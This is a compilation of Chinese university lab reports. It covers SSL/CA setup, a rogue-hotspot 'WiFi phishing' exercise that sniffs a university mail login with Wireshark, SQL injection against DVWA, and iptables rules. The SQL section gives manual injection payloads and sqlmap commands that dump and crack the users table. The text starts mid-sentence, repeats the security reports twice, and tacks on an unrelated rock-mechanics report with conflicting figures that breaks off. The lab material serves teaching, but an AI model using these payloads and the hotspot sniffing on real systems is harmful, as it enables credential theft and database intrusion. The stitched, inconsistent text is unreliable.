DROP 2)linux 主机防火墙处理数据包的顺序是什么? 答:(1)当包到达端口时,对包报头进行语法分析。大多数包过滤设备只检查IP、TCP、或UDP报头中的字段。 (2)若一条规则阻止包传输或接收,则此包便不被允许。 (3)若一条规则允许包传输或接收,则此包便可以被继续处理。(4)若包不满足任何一条规则,则此包便被阻塞。 实验三WIFI 钓鱼 步骤一 共享WIFI 工具:电脑、WIN7 系统、无线网卡 步骤 1.开始菜单-->命令提示符(cmd)-->右键,以管理员身份运行 2.运行以下命令启用虚拟网卡 >netsh wlan set hostednetwork mode=allow ssid=(这里写无线网名字)key=(这里是密码) 3.网络共享中心-->更改高级适配器设置-->右键已连接到Internet 的网络连接-->属性-->切换 到“共享”选项卡,选中其中的复选框,并选择允许其共享Internet 的网络连接,这里即我 们的虚拟WIFI 网卡 4.开启无线网络,继续在命令提示符中运行以下命令: >netsh wlan start hostednetwork 24 即可开启我们之前设置好的无线网络(相当于打开路由器的无线功能) 步骤二 WIFI 钓鱼 工具:其他笔记本或手机、Wareshark 步骤 1.搜索到刚刚设置的WIFI,连接上(密码为刚刚设置的key:12345679) 2.在笔记本上打开wareshark,选择capture-->interfaces 3.选择Packets 最多的项,点击start 按钮 4.在手机或笔记本上打开中南大学邮箱网站:http://mail.csu.edu.cn/,在主机上用wareshark 捕捉 http 的包 (这里大家可以自由实验,能监控到连接到该WIFI 的机器的所有包的情况)5.在手机或笔记本上输入用户名和密码,点击登录 6.在主机上用wareshark 捕捉到刚刚post 提交的http 包,右键选择Follow tcp stream 7.可以看到刚刚提交的用户名和密码,且是未经过加密的 实验截图 如上所示,重要的步骤截图已置于相应步骤下。 实验心得 本次实验是在自己的笔记本上做的,实验也比较简单,所以做得比较快效果比较好。通过本次实验,大致了解了WIFI钓鱼的操作过程,同时,也让自己有了警觉之心,要养成良好的WIFI使用习惯。手机会把使用过的WIFI热点都记录下来,如果WiFi开关处于打开状态,手机就会不断向周边进行搜寻,一旦遇到同名的热点就会自动进行连接,存在被钓鱼风险。因此当我们进入公共区域后,尽量不要打开WIFI开关,或者把WiFi调成锁屏后不再自动连接,避免在自己不知道的情况下连接上恶意WIFI。 实验四 SQL注入攻击 【实验目的】 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数据查询。 本次实验目的是了解sql注入的常见手段,要到两个工具: ①dvwa(Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。 ② sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。 【实验组网拓扑】 VM Client VM Server 【实验一:dvwa手动sql注入】 1、连接好虚拟机拓扑图,配置WindowsXP Client和Windows XP Server的IP使其在同一个局域网网段。 2、打开Server端的xampp,启动apache和mysql。打开Client的浏览器,访问Server的IP/dvwa,如“192.168.1.32/dvwa”,登陆账户为admin,密码为password。 3、选择SQLInjection,点击右下角的ViewSource,查看PHP源代码。 4、正常测试,输入“1”,得到正常结果,如下所示。 5、当将输入变为“'”时,页面提示错误“YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear'''''atline1”,结果如图。看到这个结果,可以知道,这个表单存在着注入漏洞。 6、尝试输入:“1’or 1=1–”注意“--”后面有空格!此时成功进行sql注入。 7、测试查询信息列数。利用语句order by num。这里输入“ 1'order by 1--” 结果页面正常显示,注意--后面有空格。继续测试,“ 1'order by 2--”,“ 1'order by 3--”,当输入3是,页面报错。页面错误信息如下,Unknown column '3' in 'order clause',由此查询结果值为2列。 8、尝试注入“1' and 1=2 union select 1,2--”,从而得出First name处显示结果为查询结果第一列的值,surname处显示结果为查询结果第二列的值,利用内置函数user(),及database(),version()注入得出连接数据库用户以及数据库名称:“1' and 1=2 union select user(),database()--”。 9、选择DVWA Security,将安全级别分别设置为中、高。再运行上面的实验sql语句,结合右下角的ViewSource,分析三种等级的代码和sql注入效果有何区别。在安全级别分别设置为低时,结合PHP源代码,考虑不采用“--”的情形下,完成sql注入,写出sql注入语句。 【实验二:sqlmap测试dvwa】 1、打开Server端的xampp,启动apache和mysql。打开Client的浏览器,访问Server的IP/dvwa,如“169.254.180.158/dvwa”,登陆账户为admin,密码为password。选择DVWA Security,将安全级别分别设置为低。 2、选择XSS reflected,输入“ 3、使用sqlmap查找注入点,打开Client端的控制台窗口,转到目录“C:Python27sqlmap”,输入以下命令,注意!“169.254.180.158”表示Server的IP,“security=low;PHPSESSID=mkoc8iuc07hfre7vvo0e5ghjv5”表示上一步所获得的cookie值,请同学们按照实际环境 33 填写相应的值!“sqlmap.py-u “http://169.254.180.158/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit”--cookie=“security=low;PHPSESSID=mkoc8iuc07hfre7vvo0e5ghjv5””。 依据以下信息,得到可能的注入点是id,数据库是mysql。 [INFO] heuristic(basic)test shows that GET parameter 'id' might be injectable(possible DBMS: 'MySQL')[INFO] GET parameter 'id' is 'MySQL UNION query(NULL)-1 to 20 columns' injectable 4、输入“sqlmap.py-u “http://169.254.180.158/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit”--cookie=“security=low;PHPSESSID=mkoc8iuc07hfre7vvo0e5ghjv5”--current-db”得到当前数据库名。 current database: 'dvwa' 5、输入“sqlmap.py-u “http://169.254.180.158/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit”--cookie=“security=low;PHPSESSID=mkoc8iuc07hfre7vvo0e5ghjv5”--current-db--tables-Ddvwa”得到数据库所有表。 6、输入“sqlmap.py-u “http://169.254.180.158/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit”--cookie=“security=low;PHPSESSID=mkoc8iuc07hfre7vvo0e5ghjv5”-T users--columns”得到user表的所有列。 7、输入“sqlmap.py-u “http://169.254.180.158/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit”--cookie=“security=low;PHPSESSID=mkoc8iuc07hfre7vvo0e5ghjv5”-T users--dump”得到user表的所有列,在sqlmap询问时候破解密码时,选择是,sqlmap会使用自己的字典来破解密码,得到5个用户的密码。此时就完成了利用sqlmap进行“拖库”的基本步骤。 实验截图 如上所示,重要的步骤截图已置于相应步骤下。 实验心得 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 此次的实验让我了解了SQL注入攻击的原理和过程,让我了解到了做这方面开发的时候需要注意的安全性问题,也意识到安全的重要性和数据库的一些欠缺,提高了自己在这方面的安全意识。在实验的过程中遇到了很多困难,配置上的,环境上的,还有一些需要注意的小问题。很高兴顺利完成了这次实验,期待下次能使用更高级的工具进行扫描和实施攻击,当然,以后的开发过程中也要特别注意这些脆弱点了。 学生姓名指导教师学 院专业班级学 号完成时间中南大学 网络安全 实验报告 代巍 张士庚 信息科学与工程学院 信安1201班 0909121615 年12月15日 2014 目录 实验一 CA证书与SSL连接 实验二 WIFI钓鱼 实验三 SQL注入攻击 实验四 配置和管理主机防火墙 实验一 CA证书与SSL连接 一.实验目的 通过申请、安装数字证书,掌握使用SSL建立安全通信通道的方法。掌握在Windows Server 2003 下独立根CA 的安装和使用。使用WEB 方式申请证书和安装证书。建立SSL 网站。 分析SSL 网站的数据包特点。二.实验原理 SSL协议的工作原理、数字证书的原理 在访问Web 站点时,如果没有较强的安全措施,用户访问的数据是可以使用网络工具 捕获并分析出来的。在Web 站点的身份验证中,有一种基本身份验证,要求用户访问输入 用户名和密码时,是以明文形式发送密码的,蓄意破坏安全性的人可以使用协议分析程序破 译出用户名和密码。那我们该如果避免呢?可利用SSL 通信协议,在Web 服务器上启用安 全通道以实现高安全性。 SSL 协议位于TCP/IP 协议与各种应用层协议之间,为数据通讯提供安全支持。SSL 协 议可分为两层: SSL 记录协议(SSL Record Protocol):它建立在可靠的传输协议(如TCP) 之上,为高层协议提供数据封装、压缩、加密等基本功能的支持。SSL 握手协议(SSL Handshake Protocol):它建立在SSL 记录协议之上,用于在实际的数据传输开始前,通讯双 方进行身份认证、协商加密算法、交换加密密钥等。每一个Windows Server 2003 证书颁发 机构都有可供用户和管理员使用的网页。三.实验环境 虚拟机:Windows Server 2003,Windows XP,Wireshark 抓包软件。四.实验过程 任务一:windows server 2003 环境下独立根CA 的安装及使用 1、windows server 2003 环境下独立根CA 的安装及使用,启动Windows Server 2003 和Windows XP,配臵其IP,使其在同一局域网网段。在Windows Server 2003 中,选择【开始】|【控制面板】|【添加和删除程序】,在弹出窗口中选择【添加和删除windows 组件】,在【组件】列表框中选择【证书服务】,再单击【下一步】按钮,如下图所示。 2、在弹出的窗口中选择【独立根CA】单选按钮,单击【下一步】按钮,在弹出窗口中按要求依次填入CA 所要求的信息,单击【下一步】按钮,如下图所示。 3、继续选择【证书数据库】、【数据库日志】和配臵信息的安装、存放路径,如下图所示,单击【下一步】按钮。安装的时候,可能会弹出如下窗口,为了实验方便,已经把I386 文件夹复制到C:下,选择【浏览】,选择文件夹“C:I386”,点【确定】,完成安装。 4、选择【开始】|【程序】|【管理工具】,可以找到【证书颁发机构】,说明CA 的安装已经完成,如下图所示。 5、从同一局域网中的另外一台XP 开启IE 浏览器,输入http://windows2003 的IP/certsrv/,选中【申请一个证书】,如下图所示,在弹出的页面中选择【web 浏览器证书】。 6、在弹出窗口中填写用户的身份信息,完成后进行【提交】。此种情况下,IE 浏览器采用 默认的加密算法生成公钥对,私钥保存在本地计算机中,公钥和用户身份信息按照标准的格式发给CA 服务器,如图所示,单击【是】,进入下一步。CA 服务器响应后,弹出证书申请成功页面,如下图所示。 7、在根CA 所在的计算机上,选择【开始】|【程序】|【管理工具】|【证书颁发机构】,上面申请的证书便会出现在窗口右边,选择证书单击右键,选择【所有任务】|【颁发】,进行证书颁发,如下图所示。证书颁发后将从【挂起的申请】文件夹转入【颁发的证书】文件夹中,表示证书颁发完成。 8、在申请证书的计算机上打开IE,输入http://windows2003 的IP/certsrv/,进入证书申请页面,选择【查看挂起的证书申请状态】,弹出的页面中选择一个已经提交的证书申请,如下图所示。选择安装此证书。 9、现在验证此CA 系统颁发的新证书是否可信,为此需要安装CA 系统的根证书,进入证书申请主页面,选择当前的CA 证书进行下载,并保存到合适路径,如下图所示。 10、下载完毕之后,在证书的保存目录中查看证书信息,单击【安装证书】按钮,进入证书导入向导,按照默认的配臵完成证书的导入,导入成功后,单击【确定】按钮,之后完成。 任务二:基于Web的SSL连接设臵 1、在XP 中,左下角【开始】,打开【Wireshark】,并点击开始抓包的按钮。打开IE 浏览器,输入网址http://windows2003 的IP/?id=1(比如:http://192.168.1.130/?id=1),然后保存Wireshark的抓包结果1。 2、选择【开始】|【程序】|【管理工具】|【IIS(Internet 信息服务)管理器】,在弹出窗口右键单击【默认网站】,弹出的快捷菜单中选择【属性】选项。 3、在弹出窗口内选择【目录安全性】标签,单击【安全通信】中的【服务器证书】按钮,如下图所示。 4、弹出【IIS 证书向导】窗口,选中【新建证书】复选项,一直单击【下一步】按钮,输入自定义的名称,如下图所示。填写相应的信息后,单击【下一步】按钮。 5、弹出【请求文件摘要】窗口,确认后单击【下一步】按钮,接着单击【完成】按钮,完成服务器端证书配臵,如下图所示 6、打开IE 浏览器(windows2003 中的),进入证书申请主界面,如下图所示。 7、在出现的网页中选择【高级证书申请】,如图所示,在出现的网页中单击第二个选项【base64编码】。打开刚才IIS 证书向导生成的请求文件,(默认路径C:certreq.txt),复制并粘贴文件内容到第一个文本框,如下图所示,单击【提交】按钮,转到完成提交后的页面。 8、回到首页,选择【查看挂起的证书申请状态】,弹出的页面中选择一个已经提交的证书申请,如下图所示。选择【Base 64 编码】,点击【下载证书】,【保存】certnew.cer 文件到桌面。 9、选择【开始】|【程序】|【管理工具】|【IIS(Internet 信息服务)管理器】,在弹出窗口右键单击【默认网站】,弹出的快捷菜单中选择【属性】选项,在弹出窗口内选择【目录安全性】标签,选择【服务器证书】,选择【下一步】,【处理挂起的请求并安装证书】选择【下一步】,【浏览】选择刚才保存的certnew.cer 文件,如下图所示。【下一步】【下一步】【完成】。 10、还是在【目录安全性】下,选择【安全通信】下的【编辑】,在下如图所示的弹出窗口中选中【要求安全通道(SSL)】复选项,并在【客户端证书】栏中选中【接受客户端证书】复选项,再单击【确定】按钮。返回【目录安全性】面板,单击【应用】按钮及【确定】按钮,完成配臵。 11、在XP 系统打开浏览器,输入服务器IP 地址,进入证书申请主页面,此时会显示错误信息页面,要求采用https 的方式连接服务器,如图所示。 12、把http 改成https 继续访问,此时浏览器提示你要安装证书,安装完证书后,就可以正常使用了。、再次打开Wireshark,并点击开始抓包的按钮。打开IE 浏览器,输入网址https://windows2003 的IP/?id=1(比如:https://192.168.1.130/?id=1),然后保存Wireshark 的抓包结果2。 14、分析比较抓包结果1 和抓包结果2 中,对IP/?id=1 请求处理的差异。 五、实验感想 至此,我完成了整个数字证书的安装和使用实验。通过本次实验我学会了SSL协议的工作原理,同时了解到了CA证书的颁发机制。 任何一个安全性系统整体性设计,都离不开数字证书的加密,可以想象加密机制对信息安全的重要性。 需要说明的是,尽管SSL能提供实际不可破译的加密功能,但是SSL安全机制的实现会大大增加系统的开销,增加了服务器CPU的额外负担,使得SSL加密传输的速度大大低于非加密传输的速度。因此,为了防止整个Web网站的性能下降,可以考虑只把SSL安全机制用来处理高度机密的信息,例如提交包含信用卡信息的表格。 实验二 WIFI钓鱼 一.实验目的 1、通过实际测试,模拟入侵者利用wifi抓包来窃取用户数据的过程。掌握整个过程中的原理,数据分析等。 2、掌握抓包软件的使用。二.实验原理 在一个可控的网络环境里,劫持数据有很多方法。比较有名的网络层抓包工具有wireshark,tcpdump,都是很好的网络协议分析工具。我们现在手机上的大多数APP应用层都是使用的HTTP协议,因此我们很多的在web安全测试里面用到的分析工具如fiddler,burp,httpanalyzer,Charles等也都是可以用来分析或者劫持APP的通信流。 用户手机里的app默认会进行很多敏感的请求,手机会自动去登陆和获取最新的信号;如果手机默认会链接周围已经被保存sid的wifi;通过内臵最常见的sid和信息,入侵者可以使得周围的人会自动链接上入侵者假设好的wifi,通过抓取相应的数据取得里面的敏感信息,理论上是可以劫持用户的相关密码信息的。三.实验环境 带有无线网卡的笔记本电脑,Wireshark 抓包软件,智能手机。四.实验过程 步骤一共享WIFI 工具:电脑、WIN7 系统、无线网卡 步骤 1.开始菜单-->命令提示符(cmd)-->右键,以管理员身份运行 2.运行以下命令启用虚拟网卡>netsh wlan set hostednetwork mode=allow ssid=(这里写无线网名字)key=(这里是密码) 3.网络共享中心-->更改高级适配器设臵-->右键已连接到Internet 的网络连接-->属性-->切换 到“共享”选项卡,选中其中的复选框,并选择允许其共享Internet 的网络连接,这里即我们的虚拟WIFI 网卡 4.开启无线网络,继续在命令提示符中运行以下命令:>netsh wlan start hostednetwork即可开启我们之前设臵好的无线网络(相当于打开路由器的无线功能) 步骤二WIFI 钓鱼工具:其他笔记本或手机、Wareshark 步骤 1.搜索到刚刚设臵的WIFI:dave,连接上(密码为刚刚设臵的key:12345678)2.在笔记本上打开wareshark,选择capture-->interfaces 3.选择Packets 最多的项,点击start 按钮 4.在手机或笔记本上打开中南大学邮箱网站:http://mail.csu.edu.cn/,在主机上用wareshark 捕捉http 的包(这里大家可以自由实验,能监控到连接到该WIFI 的机器的所有包的情况) 5.在手机或笔记本上输入用户名和密码,点击登录 6.在主机上用wareshark 捕捉到刚刚post 提交的http 包,右键选择Follow tcp stream 7.可以看到刚刚提交的用户名和密码,且是未经过加密的 五、实验感想 通过这次实验,我实际地模拟了一次入侵者通过假设钓鱼WIFI网络,来窃取连接此网络的用户的密码信息过程。整个过程中我成功地完成了对各种用户数据抓包,并分析出用户密码。 这让我对wifi网络产生了新的看法,我意识到了链接wifi网络过程当中存在很多安全隐患,如果被图谋不轨的人利用到,一旦泄露商业机密等重要信息,势必会产生重大的经济损失。 随着人们的生活越来越离不开网络,也越来越离不开移动手机,一般的公共厂商都已经将wifi作为基础服务进行提供,譬如在星巴克、麦当劳等公共场所边点杯热饮边“蹭网”,已经是一个基本的习惯了,甚至一些大型的电信提供商已经尝试将wifi作为一个基础的接入。如今公共的wifi很多,尤其是免费的,手机上还有帮助寻找免费wifi的各类app。很多人为了省流量,看到免费的wifi,总会去连接一下尝试网上冲浪。不过,在这些免费的wifi以及大家使用wifi的习惯,加上手机及app的默认行为,就可以导致一些严重安全问题。 实验三 SQL注入攻击 一.实验目的 是了解sql注入攻击的原理,掌握网站的工作机制,认识到SQL注入攻击的防范措施,加强对Web攻击的防范。 二.实验原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配臵或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数据查询。 三.实验环境 虚拟机WindowsXP系统、Windows2003系统。dvwa(Dam Vulnerable Web Application)工具,sqlmap SQL注入工具、四.实验过程 【实验一:dvwa手动sql注入】 1、连接好虚拟机拓扑图,配臵WindowsXP Client和Windows XP Server的IP使其在同一个局域网网段。 2、打开Server端的xampp,启动apache和mysql。打开Client的浏览器,访问Server的IP/dvwa,如“192.168.1.32/dvwa”,登陆账户为admin,密码为password 3、选择SQLInjection,点击右下角的ViewSource,查看PHP源代码。 4、正常测试,输入“1”,得到正常结果,如下所示。 5、当将输入变为“'”时,页面提示错“YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear'''''atline1”,结果如图。看到这个结果,可以知道,这个表单存在着注入漏洞。 6、尝试输入:“1’or 1=1–”注意“--”后面有空格!此时成功进行sql注入。 7、测试查询信息列数。利用语句order by num。这里输入“ 1'order by 1--” 结果页面正常显示,注意--后面有空格。继续测试,“ 1'order by 2--”,“ 1'order by 3--”,当输入3是,页面报错。页面错误信息如下,Unknown column '3' in 'order clause',由此查询结果值为2列。 8、尝试注入“1' and 1=2 union select 1,2--”,从而得出First name处显示结果为查询结果第一列的值,surname处显示结果为查询结果第二列的值,利用内臵函数user(),及database(),version()注入得出连接数据库用户以及数据库名称:“1' and 1=2 union select user(),database()--”。 9、选择DVWA Security,将安全级别分别设臵为中、高。再运行上面的实验sql语句,结合右下角的ViewSource,分析三种等级的代码和sql注入效果有何区别。在安全级别分别设臵为低时,结合PHP源代码,考虑不采用“--”的情形下,完成sql注入,写出sql注入语句。 【实验二:sqlmap测试dvwa】 1、打开Server端的xampp,启动apache和mysql。打开Client的浏览器,访问Server的IP/dvwa,如“192.168.1.32/dvwa”,登陆账户为admin,密码为password。选择DVWA Security,将安全级别分别设臵为低。 2、选择XSS reflected,输入“ 3、使用sqlmap查找注入点,打开Client端的控制台窗口,转到目录“C:Python27sqlmap”,输入以下命令,注意!“192.168.1.32”表示Server的IP,“security=low;PHPSESSID=tvitu9mog097jl4ctfsqhbs9o6”表示上一步所获得的cookie值,请同学们按照实际环境填写相应的值!“sqlmap.py-u http://192.168.1.32/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit--cookie=“security=low;PHPSESSID=tvitu9mog097jl4ctfsqhbs9o6””。 依据以下信息,得到可能的注入点是id,数据库是mysql。 [INFO] heuristic(basic)test shows that GET parameter 'id' might be injectable(possible DBMS: 'MySQL') [INFO] GET parameter 'id' is 'MySQL UNION query(NULL)-1 to 20 columns' injectable 4、输入“sqlmap.py-u “http://192.168.1.32/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit”--cookie=“security=low;PHPSESSID=tvitu9mog097jl4ctfsqhbs9o6”--current-db”得到当前数据库名。 current database: 'dvwa' 5、输入“sqlmap.py-u “http://192.168.1.32/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit”--cookie=“security=low;PHPSESSID=tvitu9mog097jl4ctfsqhbs9o6”--current-db--tables-Ddvwa”得到数据库所有表。 6、输入“sqlmap.py-u “http://192.168.1.32/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit”--cookie=“security=low;PHPSESSID=tvitu9mog097jl4ctfsqhbs9o6”-T users--columns”得到user表的所有列。 7、输入“sqlmap.py-u “http://192.168.1.32/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit”--cookie=“security=low;PHPSESSID=tvitu9mog097jl4ctfsqhbs9o6”-T users--dump”得到user表的所有列,在sqlmap询问时候破解密码时,选择是,sqlmap会使用自己的字典来破解密码,得到5个用户的密码。此时就完成了利用sqlmap进行“拖库”的基本步骤。五.实验感想 通过实验,我明白了带有参数的动态网页,很多都是没有进行过滤的。如果能够被SQL注入工具,就存在安全隐患,有可能就因为这个漏洞,入侵者就可以得到登录权限并控制整个服务器。 从实验可以看出,只要是带有参数的动态网页,且此网页访问了数据库,就有可能存在SQL注入攻击,因此SQL注入攻击潜在的发生概率相对于其他Web攻击要高很多,危害面也更广。其主要危害包括:获取系统控制权、未经授权状况下操作数据库的数据、恶意篡改网页内容、私自添加系统帐号或数据库使用者帐号等。 目前基于数据库的网络应用越来越多。与此同时,用于搜索SQL注入点的软件在网络上随处可见,攻击者只需要具备少量的专业知识就可以利用这些软件寻找目标进行攻击。攻击目标和攻击者的增加使得SQL注入攻击在近几年出现扩大的趋势 为了防止SQL注入带来的危害,在网站开发的过程中,需要对需要输入参数的模块进行过滤,并加入相关权限认证模块。 实验四 配置和管理主机防火墙 一.实验目的 1.学习配臵和管理主机防火墙,介绍如何配臵linux 防火墙。2.掌握linux 下基本的iptables 知识,学会配臵iptables 二.实验原理 对于Internet 上的系统,不管是什么情况,首先我们要明确一点:网络是不安全的。因此,虽然创建一个防火墙并不能保证系统100%安全,但却是绝对必要的。和社会上其它任何事物一样,Internet 经常会受到一些无聊的或者别有用心的人的干扰,防火墙的目的就是将这类人挡在你的网络之外,同时使你仍然可以完成自己的工作。因为不同的应用环境对安全的要求不一样。用一句比较恰当而且简单的话来回答这个问题:用户了解自己的Linux 系统和设臵,并且可以很好地保护好自己的数据和机密文件的安全,这对于该计算机用户来说就可以称之为他的计算机有足够的安全性。防火墙是一个或一组系统,它在网络之间执行访问控制策略。实现防火墙的实际方式各不相同,但是在原则上,防火墙可以被认为是这样一对机制:一种机制是拦阻传输流通行,另一种机制是允许传输流通过。一些防火墙偏重拦阻传输流的通行,而另一些防火墙则偏重允许传输流通过。了解有关防火墙的最重要的概念可能就是它实现了一种访问控制策略。 一般来说,防火墙在配臵上是防止来自“外部”世界未经授权的交互式登录的。这大大有助于防止破坏者登录到你网络中的计算机上。一些设计更为精巧的防火墙可以防止来自外部的传输流进入内部,但又允许内部的用户可以自由地与外部通信。如果你切断防火墙的话,它可以保护你免受网络上任何类型的攻击。防火墙的另一个非常重要的特性是可以提供一个单独的“拦阻点”,在“拦阻点”上设臵安全和审计检查。与计算机系统正受到某些人利用调制解调器拨入攻击的情况不同,防火墙可以发挥一种有效的“电话监听”和跟踪工具的作用。防火墙提供了一种重要的记录和审计功能;它们经常可以向管理员提供一些情况概要,提供有关通过防火墙的传输流的类型和数量,以及有多少次试图闯入防火墙的企图等信息。 三.实验环境 虚拟机:linux,windowsXP;linux 主机用户名:root;密码:root 四.实验过程 1.查看规则表 # iptables-L INPUT--line-numbers //查看filter表中INPUT链中的所有规则,同时显示各条规则的顺序号 2.删除、清空规则 # iptables-F //不指定表名时,默认情况filter表 3.设臵规则链默认策略 # iptables-t filter-P FORWARD DROP //将filter表中FORWARD规则的默认策略设为DROP # iptables-P OUTPUT ACCEPT //将filter表中OUTPUT规则的默认策略设为ACCEPT 4.通用(general)条件匹配(直接使用,而不依赖于其他的条件匹配及其扩展)协议匹配(允许使用的协议名包含在/etc/protocols文件中)# iptables-AINPUT-p icmp–j REJECT //拒绝进入防火墙的所有icmp数据包 地址匹配 拒绝转发来自192.168.1.11主机的数据,允许转发来自192.168.0./24网段的数据 # iptables-A FORWARD-s 192.168.1.11-j REJECT 5.隐含(implicit)条件匹配(需要指定的协议匹配为前提,其对应的功能由iptables自动(隐含)的装载入内核),如果无匹配条件,默认为REJECT。端口匹配 仅允许系统管理员从202.13.0.0/16网段使用SSH方式远程登录防火墙主机 # iptables-A INPUT-p tcp--dport 22-s 202.13.0.0/16-j ACCEPT # iptables-A INPUT-p tcp--dport 22-j DROP 6.禁止Windows主机ping防火墙linux主机,但是允许从防火墙上ping其他主机(允许接受ICMP回应数据)配臵linux防火墙主机ip地址,如下图所示: 7.配臵windows 主机ip 地址,如下图所示: 8.配臵linux 主机防火墙规则,如下图所示: 9.在此在windows 主机和linux 主机上进行相互ping 测试,测试结果如下图所示: 五.实验感想 通过本次实验,掌握了防火墙保护PC机避免被攻击的方法;在实验中,要先设臵规则,这样PC1和PC2之间就可以相互通信,方便做模拟实验;防火墙在抗攻击过程中起到了很好的作用,保护主机免受外来攻击。 锻炼了解决问题的能力。比如两个主机之间不能连通,问题可能有:双绞线本身有问题导致不能连通,电脑网卡未打开导致不连通等等。连通与否可以通过用Ping命令检查网络连接状况,其中在登录和设臵防火墙的时候也遇到很多问题,但是总的来说是完成了相关的实验,并利用基本的网络知识,锻炼了实践动手能力。通过具体的操作,基本掌握了防火墙抗攻击的配臵方式与方法,更加深入的了解防火墙的重要作用。 了解了防火墙的基本操作及原理,为以后打下基础,虽然各个厂商,各种产品的具体操作不一样,但是基本原理是相通的,通晓原理便可举一反三。同时培养了冷静分析解决问题的能力。 岩石力学与工程 实验报告 一、实验目的 1、熟悉运用岩石力学的phase软件; 2、运用岩石力学的基本理论,来计算某地的地应力值。 二、实验软件 1、岩石力学phase软件; 2、auto CAD 2006; 3、matlab 6.5软件; 4、microsoft office 2003软件。 三、实验方法与步骤 1、选取九龙河溪古水电站地质构造带作为实验基础,并用运用auto CAD软件绘制将该地区的断层、节理等地质构造单元; 2、在phase软件中导入已绘制各种边界(断裂边界、材料边界、boundry); 3、进行网格划分; 4、定义材料,并将所计算的模型设置正确的材料颜色; 5、运用matlab软件进行数据处理和计算; 5.1、已知理塘、雅江、呷巴、长河坝、乾宁的最大主应力及最小主应力,利用工程力学的力学计算方法,将已知应力点的σ 1、σ 3、最大主应力方向转换成σx、σy、τxy、τyx.可得出如表1所示的的实验数据: 地名 理塘 雅江 呷巴 长河坝 乾宁 σx 7.402573 5.352823 4.553373 3.119851 2.883026 σy 5.89742731 5.967177408 5.146626914 6.09014932 3.22697392 τxy 1.96052 0.76029 0.04486 0.42586 0.56961 x坐标-16.2352-8.7352 1.7393 7.3222-0.3815 y坐标 14.604 14.604 14.0014 13.0728 20.9622 表格1:将σ 1、σ3 转化为σ x、σy的数据表 5.2、运用matlab软件编程,求出各个地区的ν、λ、α值 令E=E;v=ν;l=λ;a=α; Yanshi1的源程序: E=input('请输入E的值:');v=input('请输入v的值:');G=E/[2*(1+v)] l=E*v/[(1+v)*(1-2*v)] a=l+2*G 对于⑤古生代到三叠纪的变质分布 有:E=12500MPa,0.22 运行matlab程序:yanshi1 请输入E的值:12500 请输入v的值:0.22 G =5.1230e+003 l =4.0252e+003 a =1.4271e+004 即求得理塘G =370.3704;l =864.1975;a =1.6049e+003 5.3、在利用auto CAD 的测量距离方法,得出理塘、雅江、呷巴、长河坝、乾宁的坐标,求得的数据如表2: 地名 E(MPa)μ λ G α x坐标 理塘 12500 0.22 4025.1756 5122.95082 14271.08-121764 雅江 12500 0.22 4025.1756 5122.95082 14271.08-65514 呷巴 12500 0.22 4025.1756 5122.95082 14271.08 13044.75 长河坝 12500 0.22 4025.1756 5122.95082 14271.08 54916.5 乾宁 12500 0.22 4025.1756 5122.95082 14271.08-2861.25 表格2:各个地区的x,y坐标 5.4、建立matlab的矩阵模型,求出系数A1,A2,A3,A4,A5,B1,B2,B3,B4,B5 Matlab的矩阵模型如下: A=[ α 0 2*α*X 0 a*Y 0 λ 0 2*λ*Y λ*X λ 0 2*λ*X 0 λ*Y 0 α 0 2*α*Y α*X 0 1 0 2*Y X 1 0 2*X 0 Y ];b=[σx;σy;τxy/G]; y坐标 109530 109530 105011 98046 157217 A*x=b; 即可得如下的系数矩阵: A=[14271, 0,-3475388088, 0, 1563111392, 0, 4025.2, 0, 881760312,-490124453 14271, 0,-1869900588, 0, 1563111392, 0, 4025.2, 0, 881760312,-263706953 14271, 0, 372324682 , 0, 1498604846, 0, 4025.2, 0, 845376529.2,52507929 14271, 0, 1567426743, 0, 1399214466, 0, 4025.2, 0, 789309518.4, 221049896 14271, 0,-81667225 , 0, 2243636672, 0, 4025.2, 0, 1265655712,-11517305 4025.2, 0,-980248906, 0, 440880156, 0, 14271, 0, 3126205260,-1737694044 4025.2, 0,-527413906, 0, 440880156, 0, 14271, 0, 3126205260,-934950294 4025.2, 0, 105015858,0, 422688265, 0, 14271, 0, 2997209691, 186162341 4025.2, 0, 442099792,0, 394654759, 0, 14271, 0, 2798625024, 783713372 4025.2, 0,-23034610,0, 632827856, 0, 14271, 0, 4487273343,-40833612 0,1,0, 219060,-121764, 1,0,-243528,0,109530 0,1,0, 219060,-65514,1,0,-131028,0,109530 0,1,0, 210021, 13044.8, 1,0, 26089.6,0,105010.5 0,1,0, 196092, 54916.5, 1,0, 109833,0,98046 0,1,0, 314433,-2861.3, 